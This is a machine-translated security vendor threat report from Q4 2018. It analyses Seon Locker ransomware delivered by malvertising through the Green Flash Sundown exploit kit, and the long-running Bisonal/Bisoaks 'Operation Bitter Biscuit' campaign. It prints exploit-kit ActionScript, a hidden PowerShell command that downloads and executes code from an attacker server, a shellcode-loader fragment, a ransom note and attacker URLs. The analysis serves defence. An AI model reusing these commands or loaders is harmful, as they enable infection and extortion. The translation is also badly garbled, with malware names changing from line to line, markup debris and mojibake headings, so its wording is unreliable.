6cT5sBmW

1ASEC REPORT Vol.93 | Security Trend 2
2ASEC REPORT
3VOL.93 Q4 2018
4The AhnLab Security Emergency Response Center (ASEC) is a service that helps customers
5Is a global security organization made up of security experts to safeguard your organization. This report was prepared by ASAP Co., Ltd.
6And a summary of the latest security technologies that address key security threats and issues. For more information, visit.
7ahnlab.com).
8Quarter 2018 Security Trends Table of Contents
9Security Issues
10SECURITY ISSUE
11• Sun locker Ransomware, access to website only 04
12Infected
13Detailed analysis of malicious code
14ANALYSIS-IN-DEPTH
15• Operation Veter Biscuits Attack Trends in 2018 15
16Security Issues
17SECURITY ISSUE
18• Sun locker Ransomware, website
19Only infected with a connection
20ASEC REPORT Vol.93 | Security Trend
21In the fourth quarter of 2018, a new Ransomware sun locker (Seon
22Locker) was found. Malvertising, a compound word of malware and advertising,
23Technique is to distribute Ransomware using the advertisement inserted in the website,
24The effect is significant because it is exposed to the user. In particular, the Ransomware, which was discovered this time,
25It is estimated that the attacker targeted domestic users because it was found in affiliate advertisement. Also,
26Users can not easily recognize the infection by using the Drive-by Download technique.
27.
28The AhnLab Security Emergency-response Center (ASEC)
29I analyzed the attack procedure closely with the attack technique of the rocker Ransomware, which was circulated with the advertisement of EIT.
3001. Attack Overview
314
32Security Issues
33Security Issue
34Ray lockers Ransomware,
35Web site access only
36Infected
37Figure 1-1 | Drive-By Download Overview
38ASEC REPORT Vol.93 | Security Trend 5
39The attacker used the drive-by download technique to spread the ray locker. How it works
40As shown in [Figure 1-1], when the user approves or does not approve the download of the file.
41If the user approves the download, the file that the user does not know the result of the installation is downloaded,
42The result is different from the intention. Download occurs even if the user does not approve the download
43do. In this case, an attacker could use an Internet Explorer
44Laura, Adobe Flash player, and Windows security vulnerabilities.
45Figure 1-2 | Drive-By Download Attack Process (1)
46The attacker uses the exploit kit as shown in [Figure 1-2] for the drive-by downloading attack
47do. The exploit kit includes scripts and malicious code that attack program security vulnerabilities.
48In this attack, the Greenflash Sundown exploit kit was used.
49Figure 1-3 | Drive-By Download Attack Process (2)
50ASEC REPORT Vol.93 | Security Trend 6
51To launch the exploit kit, the user must visit the website where the malicious script is embedded. ball
52The grid can be used to create a Decoy site disguised as a normal site as shown in [Figure 1-3]
53I hacked and inserted a malicious script. They also used the online advertising mulberry typing technique.
54Figure 1-4 | Drive-By Download Attack Process (3)
55Finally, when the user is surfing the internet,
56When you access the website where the script is embedded,
57Green Flash uploaded to the attacker server as shown in [1-4]
58A pre-order exploit is executed. At this time,
59If a security vulnerability exists, the user
60This system infects malicious code.
61Such drive-by download attacks are used
62It is not easy to recognize the fact that it is infected with a malicious code.
632. Attack Process
64The attacker inserts a malicious script into the website to use the Green Flash Sundown exploit kit.
65The characteristic point is that as shown in [Figure 1-5]
66An attacker inserts a malicious script into the
67Instead of inserting script into every web page
68A web page with a high frequency of visits
69I won the prize.
70In addition, the malicious script can be used
71A malicious script embedded in a web page of a domestic media site
72ASEC REPORT Vol.93 | Security Trend 7
73Explorer) to the Landing Page of the Green Flash Exploding Kit.
74When you are connected to the landing page, you can use the version of the program to take advantage of the vulnerability in Adobe Flash Player.
75It is big. For the script used in this attack, the major version of Flash player is 10 or more, 29 or less
76The above command is executed. [Table 1-1] is part of the Green Flash Sundown exploit kit landing page.
77If the condition is met and the command is executed, the malicious Flash file will be executed,
78The kit consists of a total of three flash files for detection bypassing.
79SWF File (show_ads.js)
80var url: String = "B64Z5BF4fDB7eOg7J6BLc4o2aQUsCESreQ ==";
81var url_key: String = "QVNPbTIzbmxkMw ==";
82var url_key_byt: ByteArray = new ByteArray ();
83var key: String = generateRandomString (10);
84key_byte = new ByteArray ();
85key_byte.writeMultiByte (key, "UTF8");
86var token: String = processData (key);
87key = "";
88if (ActiveX == Capabilities.playerType)
89{
90 url_dec = Rc4 (Base64.decodeToByteArray (url_key), Base64.decodeToByteArray (url));
91 data_load = new URLLoader ();
92 data_load.dataFormat = URLLoaderDataFormat.BINARY;
93 data_load.addEventListener (Event.COMPLETE, _jj18);
94 _dv34 = new URLRequest (url_dec + "? token =" + encodeURIComponent (token));
95 data_load.load (_dv34);
96}
97Table 1-2 | Green Flash Sundown Exploit Kit - Flash File (Phase 1)
98First, in the first stage flash file, the connection address of the second stage flash file is stored in the string variable url. The
99Since the ring variable is encrypted using the RC4 encryption method as shown in [Table 1-2], it is decrypted
100Landing Page (ads.html)
101<object classid = "clsid: d27cdb6e-ae6d-11cf-96b8-444553540000" width = "400" height = "400">
102 <param name = "movie" value = "http://adop.us/show_ads.js" />
103 <param name = "play" value = "true" />
104 <param name = "allowcriptaccess" value = "always" />
105Table 1-1 | Green Flash Sundown Exploit Kit - Part of the landing page
106ASEC REPORT Vol.93 | Security Trend 8
107The stored key is re-encrypted with the RSA encryption method using the attacker's public key as shown in [Table 1-3]
108It is stored in the ring variable token (token). The generated url_dec and token are combined,
109Request the connection of the flash file.
110It is stored back in the ring variable url_dec. Then, it generates a 10-digit random string composed of upper and lower case letters and numbers
111And stores it in a string variable key.
112SWF File (show_ads.js)
113var processData: Function = function (param1: String): String
114{
115 \ n "+" MFswDQYJKoZIhvcNAQEBBQADSgAwRwJAbkQoqittIfJPWqUP / O45yh9ZfI8hAae2 \ n "+" \ n "+" ----- BEGIN PUBLIC KEY -
116"f0F8OqSEHrUcRLfeZCxpwlJgJQS426HaIy / ifPsC3hDayKhO9yTpbwIDAQAB \ n" + "----- END PUBLIC KEY -----";
117 var _loc3_: ByteArray = new ByteArray ();
118 var _loc4_: ByteArray = new ByteArray ();
119 var _loc5_: String = "";
120 var _loc6_: RSAKey = PEM.readRSAPublicKey (_loc2_);
121 _loc3_ = Hex.toArray (Hex.fromString (param1));
122 _loc6_.encrypt (_loc3 _, _ loc4 _, _ loc3_.length);
123 _loc5_ = Base64.encodeByteArray (_loc4_);
124 return _loc5_;
125};
126Table 1-3 | Green Flash Sundown Exploit Kit - Flash File (Phase 1)
127Landing Page (ads.js)
128http: // url_dec + "? token =" + encodeURIComponent (token)
129→ http: // adop [.] Pro / index.php? Token = YEFHWRKw0w5oNNECvY ... omit ...
130Table 1-4 | Green Flash Sundown Exploit Kit - Flash File (Phase 1)
131There is a connection from the attacker server to the second level flash file.
132And decrypts the received token and returns the key value
133want. Use the restored key value to create a 2-step flash file
134RC4 encryption method and transmits it. year
135This process is shown in [Figure 1-6].
136Figure 1-6 | Green Flash Line Down Exploit Kit - Flash File (Level 1) Encrypted two-level Flash file sent and received decrypted
137ASEC REPORT Vol.93 | Security Trend 9
138, And it is executed in memory. As shown in [Table 1-5], the 2 stage flash file is connected to the 3 stage flash file
139The address is stored in the string variable 'wewqqww'.
140Since it is encrypted using RC4 encryption method as before, it is decrypted and used.
141You can find a difference in the key value used. In the previous step 1 flash file, the key value is 10 random characters
142However, in the second level flash file, the link address of the third level flash file is used as the key value.
143SWF File (index.php)
144jjeiejiee = new ByteArray ();
145var _ver1: Boolean = false;
146var wewqqqww: String = "... Q ... omitted ..., 09090909090909 ... omitted ...";
147var askjdskjw: Number = 0;
148wewqqqww = wewqqqww.sstr (0, wewqqqww.indexOf (","));
149var kwkw: String = "21";
150var ddds3: String = mnznnznxzxzxzx (wewqqqww, kwkw);
151var sdkdjddd2: String = "";
152sdkdjddd2 = ddds3sstr (7, ddds3.lastIndexOf ("/") - 7);
153kbkiuiuui = new ByteArray ();
154kbkiuiuui.writeUTFBytes (sdkdjddd2);
155if (zxzxzzszx ())
156{
157 zbzvzzzzzzx = new URLLoader ();
158 zbzvzzzzzzx.dataFormat = URLLoaderDataFormat.BINARY;
159 zbzvzzzzzzx.addEventListener (Event.COMPLETE, zxxzxnmmzz);
160 request = new URLRequest (mnznnznxzxzxzx (wewqqqww, kwkw));
161 zbzvzzzzzzx.load (request);
162var zxzxzzszx: Function = function (): Boolean
163{
164 var _loc1_: String = Capabilities.version;
165 _loc1_ = _loc1_.substr (4);
166 _loc1_ = _loc1_.replace (/ [,] / g, "");
167 var _loc2_: uint = uint (_loc1_);
168 if (! §§pop ())
169 {
170 return false;
171 }
172 if (_loc2_ <2800164)
173 {
174 if (_loc2_> 2100164)
175 {
176 }
177 return true;
178 }
179 return false;
180};
181Table 1-5 | Green Flash Sundown Exploit Kit - Flash File (Phase 2)
182Also, in the case of 2-step flash file, 3-step flash wave
183Before connecting work, you need to install the
184Check the version of the player at the time. As shown in [Table 1-5]
185If the version is higher than 28.00.164,
186System Flash file is not connected.
187The flash file of Step 3 is shown in Figure 1-7 as shown in [Figure 1-7]. Green Flash Sundown Exploit Kit - Flash file (3 levels)
188ASEC REPORT Vol.93 | Security Trend 10
189There is a shellcode used for non-flash player security vulnerability CVE-2018-4878. Shellcode Execution
190Execute the command [Table 1-6] on the system.
191Command Line
192cmd.exe / q / c
193"powErShEll.ExE -nop -w hIddEn -c $ J = nEw-objEct nEt.wEbclIEnt;
194$ J.proxy = [NEt.WEbREquESt] :: GEtSyStEmWEbProxy ();
195$ J.Proxy.CrEdEntIalS = [NEt.CrEdEntIalCacheE] :: DEfaultCrEdEntIalS;
196IEX $ J.downloadStrIng ('http://lloydss.bestdealsadvbiz.space/index.php'); "
197Riptine ... omit ...
198Table 1-6 | Command information
199Command Line
200[Byte []] $ key = [System.Text.Encoding] :: ASCII.GetBytes ("LU5V")
201$ m = new-Object System.Net.WebClient;
202[Byte []] $ data = $ m.DownloadData ("http://lloydss.bestdealsadvbiz.space/index.php?mk=" + $ av_base + "& sq =" + $ vm_base)
203[Byte []] $ iJF = rc4 $ data $ key
204$ b0Z = [System.Runtime.InteropServices.Marshal] :: GetDelegateForFunctionPointer ((mu kernel32.dll VirtualAlloc), (k9no_ @ ([IntPtr]
205Invoke ([IntPtr] :: Zero, $ iJF.Length, 0x3000, 0x40) [UInt32], [UInt32], [UInt32]
206[System.Runtime.InteropServices.Marshal] :: Copy ($ iJF, 0, $ b0Z, $ iJF.length)
207Table 1-7 | Part of index.php page decrypted
208Once the command is executed, you can use Powershell, which runs the Windows operating system scripting language
209Request data for malicious code execution from the attacker's server.
210The data received from the attacker server is once again encrypted with Base64 and Gzip.
211need.
212If you look at some of the decrypted data, you can see that as in [Table 1-7]
213Code to decrypt RC4 encryption and confirmation of installation of anti-virus products (Window Defender)
214There is URL address information for confirming the fixed information and for downloading the encoded binary. Finally,
215The file downloaded from the URL causes malicious behavior on the user's system.
216ASEC REPORT Vol.93 | Security Trend 11
217Figure 1-8 | Encoded binaries and decoded binaries
218Until now, the encoded binaries that have been verified are:
219(Gandcrab) Ransomware and Sun Rocker Ransomware. All
220The downloaded version of Gand crap is v5.04,
221Can be found on the ASEC blog.
222Meanwhile, a series of line lockers Ransomware found this time
223The following are the behaviors. First, through the power shell
224The additional encoded binary is decoded. after
225Copy the binaries in memory until the shellcode finds the string 'dave' from MZ,
226Lt; / RTI & gt; This means that files are not created,
227Rocker Ransomware is one of the features.
228Also, in order to check whether the line locker Ransomware has been infected, first check whether there is a key in the registry path of [Table 1-8]
229Check.
230If the registry key is present, run it
231Lt; / RTI & gt; 0x30 if there is no key value
232To generate a random number from fixt_rBHZ1htKFbhxSIjZ and
233After performing the XOR operation and encoding,
234The data of the machine is stored in the registry value like [Figure 1-9]
235. The values ​​stored in the registry
236Used for future decoding.
237Registry path
238HKEY_CURRENT_USER \ Software \ GUN \ Display \ windowData
239Table 1-8 | Registry path
240Figure 1-9 | Registry value
241ASEC REPORT Vol.93 | Security Trend 12
242Sun locker Ransomware uses DRIVE_FIXED, DRIVE_REMOTE from A: \ to Z: \ using GetDriveTypeW API
243Of the total number of victims. The drive path search process is shown in [Figure 1-10].
244It also checks for filenames for encryption, and checks all strings for lowercase
245All. Therefore, the string to be excluded from encryption stored in malicious code is all lowercase.
246Excluded from encryption
247Folder file
248시스템 volume 정보
249programdata
250application data
251$ windows. ~ bt
252program files
253tor browser
254Windows
255mozilla
256appdata
257windows.old
258program files (x86)
259$ recycle.bin
260google
261boot
262bootsect.bak
263ntuser.ini
264thumbs.db
265your_files_are_encrypted.txt
266ntldr
267iconcache.db
268desktop.ini
269ntuser.dat.log
270bootfont.bin
271ntuser.dat
272boot.ini
273autorun.inf
274extension
275mod adv dll msstyles
276mpa nomedia ocx cmd
277ps1 themepack sys prf
278diagcfg cab ldf diagpkg
279icl 386 ico cur
280ics ani bat com
281rtp diagcab nls msc
282deskthemepack idx msp msu
283cpl bin shs wpx
284icns exe rom theme
285hlp spl fixt lnk
286scr drv
287Table 1-9 | Exclude folders, files, and extensions
288Figure 1-10 | Drive Path Search
289ASEC REPORT Vol.93 | Security Trend 13
290Finally, the locker Ransomware encrypts the rest of the files except for the encryption target of [Table 1-9].
291Add * .FIXT after the file name. Encrypted exclusion contains fixt in the extension,
292. In addition, Ransomware SunLocker, regardless of file encryption, when entering the folder Ransom
293Note It creates a file 'YOUR_FILES_ARE_ENCRYPTED.TXT', and when the system infection is finished,
294And disappears from memory. Ransom note of Ransomware is shown in [Table 1-10].
295YOUR_FILES_ARE_ENCRYPTED.TXT
296SEON RANSOMWARE
297all your files are encrypted
298There is only one way to get your files back: contact with us, pay and get decryptor software
299We accept Bitcoin and other cryptocurrencies
300You can decrypt 1 file for free
301write email to kleomicro@gmail.com or kleomicro@dicksinhisan.us
302Table 1-10 | About Ransom Notes
303As we have seen so far, Ransomware has been a major target for attacking domestic websites,
304Unless you know it, you may be infected with Ransomware just by accessing the website.
305In order to prevent such infection with Ransomware, install security update regularly.
306Continued PC management is required, such as keeping the vaccine and applications up to date.
307The V3 product line detects the line locker Ransomware with the following diagnosis.
308<V3 Family Diagnostics>
309• Malware / Gen.Generic (2018.10.25.00)
310• Powershell / Seoncrypt (2018.11.16.00)
311• BinImage / EncPE (2018.11.16.00)
312• Malware / MDP.Ransom.M1996
313Malware
314Detailed analysis
315ANALYSIS-IN-DEPTH
316• Operation bitter biscuit
317Attack Trends in 2018
318ASEC REPORT Vol.93 | Security Trend
319The so-called 'Operation Bitter Biscuit' is an attack from 2011
320It was intensified. Using Bisonal-type malicious code, major organizations such as domestic military and defense industries
321It has been attacking for a long period of time as a target. It is going to be lukewarm since last fall of 2017
322This attack, which was seen in Rum, was captured again in 2018. On the other hand, the Bisonal-type malicious code used in the attack
323There has been an association with a large number of attack groups. Anap will also report the ASEC Report for the third quarter of 2017
324I have discussed the attacking behavior of operation bitter biscuits.
325In this report, we focus on actual attacks in Korea in 2018,
326(AhnLab Security Emergency-response Center, hereinafter referred to as ASEC)
327We will look at the attack trends and attack techniques of the kit.
32801. Operation Bitter Biscuit Attack Trend
329Arsenic-type malware that was first discovered in 2010 is mainly used for operation-bitter biscuit attacks,
330So far, it has appeared in attacks against Korea, Japan, India and Russia. In Korea, the first in 2011
331And was used to attack Japan's defense industry in 2012, the following year. Meanwhile, 2015
332The year CERT in India warned about the arsenic-free transformation, Bioazih.1
33315
334Operation bitter biscuit
335Attack Trends in 2018
336Detailed analysis of malicious code
337Analysis-In-Depth
338ASEC REPORT Vol.93 | Security Trend 16
339As a result of analyzing the attacking trend of operation bitter biscuits,
340It was confirmed that it was actively used in the attack. From 2011 to spring 2012, the number of attacks against domestic institutions
341, And attacks from domestic companies and military companies continued between 2013 and 2015. Also 2016
342In 2017 and 2017, attacks on defense companies and affiliated companies were carried out. In 2018,
343It seems to have expanded the attack target gradually by concentrating attacks on my marine related field. And
344As the operation of the operation bitter biscuits continues over a long period of time,
345The group has been analyzed and tracked.
34602. Case of domestic attack in 2018
347[Table 2-1] summarizes the major attacks of Operation Veter Biscuits in 2018 as a timeline. By 2017
348The attack, which had been quiet since then, began again in spring 2018. Domestic marine industry from March to July 2018
349Attacks on the field were confirmed.
350Temporary attack target contents
351March 2018? (Marine field estimation) Attempts to attack with .scr. Create Downloader
352In March 2018, the Korean government is attempting to attack with the government officials (grade 9) (2018.03.05) .pdf .exe of the Marine Police Agency in 2018. Create backdoor
353March 2018? (Estimation of marine area) Attacking with medium bulletproof service line 1.pdf.exe. Create backdoor
354July 2018? (Estimation of marine area) Disguised as documents related to marine companies. Create Packed Downloader
355In September 2018, only the back door of the Korean government was found.
356Table 2-1 | Major attack timeline in 2018
357The characteristic of the attack in 2018 is that the attacker uses a new dropper. Newly changed
358When the dropper is run, it will send a decoy document that attracts the user, malicious code and VBS (Visual Basic
359Script) file.
360In the decoy document of the malicious code found in [Figure 2-1] in 2018,
361It can be confirmed that the attack concentrates on the attacker.
362ASEC REPORT Vol.93 | Security Trend 17
363Figure 2-1 | Decoy documents of malware found in 2018
364The malicious code generated by the dropper
365The downloader that downloads the code
366You can use a backdoor to perform remote commands.
367. Some of the malicious code found is written to the end of the file.
368Add Leggi value to tens of megabytes
369With a length of up to 100 megabytes
370It also creates large files. Meanwhile,
371In the case of VBS files, the script showing the decoy document, the dropped dropper and the executed VBS file itself
372The script is divided into two parts.
37303. Malicious code analysis
374Let's take a look at the dropper, downloader, and backdoor used in the 2018 Operational Bitter Biscuit attack.
3753-1) Dropper analysis
376The 'Scratchback.scr' file found on March 5, 2018 was used as a dropper. The basic information of the dropper is
377Table 2-2 shows the results.
378File name Retirement factor Takeover data .scr
379File length 260,968
380File Creation Period December 26, 2015 22: 1: 29 (UTC)
381MD5 e5a8c1df0360baeeeab767d8422cc58f
382SHA1 0ba6787751e7e80c0911f666fd42a175dd419e0e
383SHA256 013c87898926de3f6cc8266c79c7888d92eb1546a49493d1433b8261d2e41e77
384Main functions and features Create Decoy document, executable file, VBS file
385Drop Diagnostic Name Dropper / Win32.Bisonal
386Table 2-2 | Dropper basic information
387When the dropper is executed, a Decoy document, an executable file, and a VBS file are generated as shown in [Figure 2-2].
388ASEC REPORT Vol.93 | Security Trend 18
389As mentioned earlier, Decoy documents can be used to infer attack targets,
390This document is all about the domestic marine sector. The executable file is also the downloader,
391It also includes words. The two VBS files are the files that will open the decoy document in the Office program,
392The dropper file is divided into files to delete.
3933-2) Downloader analysis
394The main features and features of the downloader used in this attack are to check the name of the file that was executed,
395If you do not want to generate services.exe file such as c: \ Users \ [Username] \ Applications \ Microsoft path
396All. At this time, the garbage value is added to the end of the file to finally generate a file having a file length of about 4 MB.
397The basic information of the downloader is shown in [Table 2-3].
398File name 3.tmp
399File length 10,752
400File creation period February 25, 2018 00:21:33 (UTC)
401MD5 d198e4632f9c4b9a3efbd6b1ed378d26
402SHA1 bb8be657e4bf1eb9a89ae66cb6c8a8d6baa934d4
403SHA256 4652882a64cc8fe823ab6d7c2166f1dbf9b75794d024ddbfaa173b6f9107a19f
404Key Features and Benefits Generates services.exe with a length of 4 megabytes or more. Save system information as ms.log. Download additional malware
405Diagnostic Name Trojan / Win32.Bisdow
406Table 2-3 | Downloader Basic Information
407Figure 2-2 | Configure Malware
408ASEC REPORT Vol.93 | Security Trend 19
409[Figure 2-3] compares the original file and the generated file with garbage value added due to the downloader. This
410It is presumed that the user creates an arbitrary file in order to make it difficult to find the malicious code with the hash value. uh
411Some variants created files with lengths of about 100 MB.
412The downloader checks that the name of the file executed is services.exe
413, Register services.exe in the registry.
414And creates the Windows Message.lnk file,
415Windows Message LNK files are shown in [Figure 2-4] and
416As well as the shortcut contents of malicious services.exe
417"He said. Figure 2-4 | LNK file contents
418Figure 2-3 | Generation file with original file and garbage value added
419Figure 2-5 | System information collection contents
420You can also use ipconfig.exe and net.exe to store system information in the ms.log file, and then http: //mp.motlat.
421com / info / wel.gif. [Figure 2-5]
422Stem information collection contents.
423Downloader only visible in variants found in 2018
424When you try to download additional files [
4252-6] in the virtual environment through the disk name
426ASEC REPORT Vol.93 | Security Trend 20
427It is to check the execution. Variations discovered before 2018 do not have a virtual environment check feature.
428Figure 2-6 | Virtual environment check
429The downloader downloads the MsUpdata.exe file from http://mp.motlat.com/lvs/tips.htm.
430As a result of the analysis, we found that msupdata.exe (2c0522a805fa845ec9385eb5400e
4318d16) files have been distributed. msupdata.exe is also a downloader that downloads other malware
432No malicious code was finally downloaded.
4333-3) Backdoor Analysis
434In 2018, a backdoor file was created via a similar dropper. Malicious code associated with this backdoor
435Was discovered in the fall of 2014. Arsenic blade deformations were also found in the same attack target. Backdoor
436The basic information is shown in [Table 2-4].
437File name 3.tmp
438File length 28,672 bytes
439File Creation Period February 10, 2018 4:10:36 (UTC)
440MD5 fc78fff75df0291d8c514f595f68c654
441SHA1 aec101161bdfada59b93ef47f1b814e4fea54c9e
442SHA256 6631d7045a2209ca5dbcf5071cb97eaea8cfba2e875a75e5535ba9180aaaf8d1
443Key Features and Benefits Backdoor
444Diagnostic Name Backdoor / Win32.Bisoaks
445Table 2-4 | Backdoor Basic Information
446ASEC REPORT Vol.93 | Security Trend 21
447These Bisoaks malicious codes, which are arsenic augmentation variants, are characterized as 'axpbu.txt', as in [Figure 2-7]
448There is a string like 'mismyou'. However, some malicious code is packed with PECompact or MPRESS
449I can not check the character string.
450When the malicious code is executed, the registry key HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \
451Register the file executed in mismyou of CurrnetVersion \ Run.
452Finally, Bisoaks malicious code executes commands received from the C & C server.
453Collecting system information, collecting process lists, terminating processes, downloading files, and executing files. In some variations
454And the self-deletion function was also confirmed.
45504. Relationship
456Analysis of the operational bi-buster attack in 2018 showed that the dropper used in this attack was the attacker's new
457It is estimated to be malicious code produced by the company. But in the case of downloaders and backdoors,
458. The Bisoaks malware, an arsenic-clad variant, also resembles the same place in 2014 and 2018
459The attack was done with a variant with one code. [Figure 2-8] shows that the operation
460It is a relationship diagram of used malicious code.
461Figure 2-7 | Bisoaks Characteristic string of malicious code
462ASEC REPORT Vol.93 | Security Trend 22
463Code similarity between downloaders found in 2014 and 2018 (fd45ecc5b111948507ace52fc95
464253ae) can be found in [Figure 2-9].
465Figure 2-8 | Attacking malware in 2018
466Some variants have download addresses associated with the country. In addition, as shown in [Figure 2-10]
467(00c479bf76dc90db51209d2fa2a9cf6a) which contains a false certificate disguised as a certificate.
468Figure 2-9 | 2014 and 2018 downloader string comparison
469ASEC REPORT Vol.93 | Security Trend 23
470Figure 2-10 | A downloader file pretending to be a digital signature of AAPL
471It can be inferred that Luo Korea is a major attack target.
472The Bisoaks backdoor, discovered in 2018,
473There is heat, and as shown in [Figure 2-11]
474Monthly detected strain (45a416f10ccb2c31ff391e61a75
47584f1f), it is confirmed that there is a similar character string
476.
477Figure 2-11 | Characteristic string of Bisoaks variant in 2014
478As shown in [Figure 2-12], the code found in September 2014, and the malicious code found in March 2018,
479It has a private nature.
480Figure 2-12 | Comparison between the September 2014 variant and the March 2018 variant
481ASEC REPORT Vol.93 | Security Trend 24
482Meanwhile, Bisoaks malware includes campaign ID, and in variants found in Korea, 0903, 0917,
4831016-02, 443, pmo, hjing, 24-kncck, 8000, 95, 48 and so on.
484There are a total of 29 variants of the backdoor, and related variants exist from September 2014,
485Respectively. Therefore, this attacker can be assumed to be active in Korea for at least four years.
486Although it is unclear whether operation-bitter biscuit attacks are being performed in one group,
487Through years of attack trend, Bisoaks malware can also be seen as related malicious code of operation Veter biscuits.
488Bisoaks malicious code, which has been used to attack operation bitter biscuits since 2014,
489It is because it was used. [Figure 2-13] shows that malicious code used in Operation Veter biscuits
490It is listed as of 2018.
491그림 2-13 | 오퍼레이션 비터 비스킷 연관 악성코드 종류
49205. ê²°ë¡ 
493지난 2017년 가을 이후 행적을 감췄던 오퍼레이션 비터 비스킷은 올해 2018년 3월부터 다시 국내 주
494요 기관을 향한 공격을 수행했다. 2017년까지는 주로 국내 군사 기업 및 방위산업체에 대한 공격을 진
495행한 반면 2018년에는 해양 관련 분야에 대한 공격을 집중적으로 수행하며 공격 대상을 확대한 것으
496로 보인다. 이들이 명확히 동일한 그룹 인지는 확인되지 않았지만, 공격에 사용된 악성코드의 유사성
497ASEC REPORT Vol.93 | Security Trend 25
498으로 보아 2018년 봄에 확인된 공격은 적어도 2014년부터 국내 정부 기관에 대한 공격을 수행해왔음
499을 추정할 수 있다.
500약 10년 가까이 한국을 노리고 있는 미지의 위협은 여전히 은밀하게 국내 주요 기관 및 기업을 공격하
501고 있다. 2018년에는 해양 분야만 집중적으로 공격했지만, 2019년에는 어느 분야를 새로운 공격 대상
502으로 삼을지 오퍼레이션 비터 비스킷의 앞으로의 추이를 지속적으로 예의 주시해야 할 것이다.
50306. IoC (Indicators of Compromise)
504드롭퍼(Dropper)
5051cd5a3e42e9fa36c342a2a4ea85feeb4 bbfcb2d66784c0f7afc334f18a0866a7 e3bac3712aaca2881d1f82225bb75860
506e5a8c1df0360baeeeab767d8422cc58f e6e607ab6bd694ffcfe1451ed367d068 f408653378b02858c0998ee4d726c8b8
507다운로더(Downloader)
50800c479bf76dc90db51209d2fa2a9cf6a 2c0522a805fa845ec9385eb5400e8d16 40f69d52559610d1f34f95e7a2c7924c
509410a19c9e5d6269e0d690307787e5fea 46224c767a6c2765738a00bb9d797814 862f3c0bd6c1ecee39442271df6e954d
510b13429ccf79d94a82dab0b30e0789227 d198e4632f9c4b9a3efbd6b1ed378d26 ef3103a76e101f7f19541d1cbbd2bd13
511f61c3f0eb173b2c5f38a1c9d5acda0dc fd45ecc5b111948507ace52fc95253ae
512백도어(Backdoor)
5133cc4e80a358e0f048138872bc79999cd 45a416f10ccb2c31ff391e61a7584f1f d0efdee5eaaf29cceab4678f652f04f9
514fc78fff75df0291d8c514f595f68c654
515URL ì •ë³´
516http://21kmg.my-homeip.net http://hosting.twinkes.net/otete2/css/topblack.php
517http://img.bealfinerdns.co.kr/script/index.htm http://info.cherishk.com/rss/vide.php
518http://kecao.my-homeip.de http://live.triphose.com/data/asinfo.htm
519http://mp.motlat.com/info/wel.gif http://mp.motlat.com/lvs/tips.htm
520http://pmad.dyndns.myonlineportal.de http://sky.versignlist.com/images/jsphore.htm
521http://soft.koreagzer.com/news http://wel.versignlist.com/css/skywood.htm
522http://www.hankookchon.com/css/serverlet.htm
523파일 이름
524chrome.exe conhost.exe contray.exe
525msupdata.exe msviewer.exe serv.exe
526services.exe taskhost.exe (100 MB 이상 파일 길이 가짐)
527ASEC REPORT Vol.93 | Security Trend 26